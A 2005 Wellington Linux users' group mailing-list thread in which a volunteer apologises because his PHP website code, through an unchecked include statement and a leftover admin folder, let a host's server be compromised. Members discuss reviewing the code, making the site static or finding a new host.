[wlug_org] New website/website host required
Centurion Computer Technology Ltd
wlug_org@lists.wellylug.org.nz
Sat, 18 Jun 2005 12:12:03 +1200
Jethro,
Send me a copy of your code and I will look it over.
On Fri, 2005-06-17 at 16:57 +1200, Jethro Carr wrote:
> ohh s**t....
>
> First off, really sorry to Ewen for this.
>
> The problem is the /admin folder which was written along time ago and
> should have been deleted. I can really make no excuses for not doing
> this. A change in the website structure caused this to break and I never
> checked it.
>
>
> The first problem Ewen mentions was a problem with my
> include_once($variable) statement, when I first started programming with
> PHP, I didn't relise that I needed to check for other webpages being
> inserted into the $variable value. This caused Ewen's server to be
> comprimised. :-(
>
>
> > A brief look at the database, and the rest of the code leaves me feeling
> > that a considerable amount of work would be required before I felt it
> > was "safe" to run on my webservers.
>
> Ewen, if you would be kind enough to mention (to me) a couple of things
> to look at, I would be greatfull. I'm not aware of any major flaws, so I
> would like to know if there are.
>
>
>
> > Hence the options are either
> > (a) converting it to a static-only website,
>
> I, or someone else can do this.
>
> > or (b) moving it somewhere else.
>
> Anyone who wants to, please inform the list.
>
>
> > PS: "Fixing it up" and then running it on my webservers is no longer an
> > option. We tried that after the first exploit.
>
> I understand your stand completely Ewen, and I'm real sorry for this.
>
>
>
> I'm also happy to opensource the code to anyone to take a look at.
>
>
>
--
Daniel Reurich
Centurion Computer Technology (2005) Limited
Ph: (04) 565 1832
Mobile: (021) 797 722
email: daniel@centurion.net.nz